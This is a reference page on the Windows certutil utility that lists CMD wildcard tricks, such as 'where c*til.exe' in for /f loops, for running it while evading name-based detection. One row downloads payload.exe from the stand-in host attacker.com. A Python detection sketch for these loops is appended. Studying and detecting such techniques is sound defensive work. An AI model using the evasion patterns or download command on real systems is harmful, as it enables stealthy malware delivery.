certutil
Certificate management utility. Widely abused for base64 encoding/decoding and downloading files from the internet.
Binary Paths
C:\Windows\System32\certutil.exe
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
| `for /f %i in ('where c*til.exe') do %i -urlcache -split -f http://attacker.com/payload.exe C:\payload.exe` | `*` | CMD requires 'where' + for loop since glob doesn't work in command position. Star matches 'er' + 'u' |
| `for /f %i in ('where cert?til.exe') do %i` | `?` | Single char wildcard in where query |
| `for /f %i in ('where certutil*') do %i` | `*` | Trailing star matches '.exe' and variant names |
| `cmd /c for /f %i in ('dir /b C:\Windows\System32\cert*.exe') do %i` | `*` | Using dir /b with glob to find binary |
| `for /f %i in ('where /r C:\Windows c*til.exe') do %i` | `*` | Recursive where search with wildcard |
Platform Notes
CMD does not expand glob wildcards in the command position. Unlike bash, typing c*rtutil will not work directly in CMD. Instead, use:
- `for /f %i in ('where c*til.exe') do @%i [args]` (resolves via where.exe)
- `for /f %i in ('dir /b C:\Windows\System32\cert*.exe') do @%i` (resolves via dir)
In batch scripts, use %%i instead of %i.
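
Detection sketch for the loop shape above, added here as an example and not part of the original page: it flags `for /f` loops whose `where` or `dir` query contains a wildcard that would resolve to certutil.exe, which a plain string match on "certutil" misses. The function names, the regex and the benign sample lines are constructed for illustration; counting a match against the bare name `certutil` assumes the query may omit the extension.

```python
import fnmatch
import re

# Loop shape from this page: for /f %i in ('<where|dir> ...') do ...
# %%i (batch-script form) is accepted as well as %i.
LOOP_RE = re.compile(
    r"for\s+/f\s+%%?\w\s+in\s*\(\s*'(?P<inner>(?:where|dir)\b[^']*)'\s*\)\s*do\b",
    re.IGNORECASE,
)
TARGET = "certutil.exe"


def glob_hits_certutil(token: str) -> bool:
    """True if a wildcard token could resolve to certutil.exe."""
    # Keep only the file-name part of a path such as C:\Windows\System32\cert*.exe
    name = token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if "*" not in name and "?" not in name:
        return False  # a literal name is covered by ordinary string matching
    name = name.replace("[", "[[]")  # '[' is not a wildcard in CMD
    # Assumption: the query may omit the extension, so test the bare name too.
    return any(fnmatch.fnmatchcase(c, name) for c in (TARGET, "certutil"))


def detect(cmdline: str) -> list[str]:
    """Return the wildcard tokens in for /f where|dir loops that match certutil."""
    hits = []
    for m in LOOP_RE.finditer(cmdline):
        tokens = m.group("inner").split()[1:]  # drop 'where' / 'dir'
        hits += [t for t in tokens
                 if not t.startswith("/") and glob_hits_certutil(t)]
    return hits


# First three lines come from the table above; the last two are constructed.
SAMPLES = [
    r"for /f %i in ('where cert?til.exe') do %i",
    r"cmd /c for /f %i in ('dir /b C:\Windows\System32\cert*.exe') do %i",
    r"for /f %i in ('where /r C:\Windows c*til.exe') do %i",
    r"for /f %i in ('where python*.exe') do %i --version",
    r"certutil -hashfile file.bin SHA256",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print("ALERT" if detect(line) else "ok   ", line)
```

Run it over process-creation command lines (for example Sysmon Event ID 1 or Security 4688 with command-line auditing); the resolved certutil.exe child process is still logged separately and should be correlated with the parent loop.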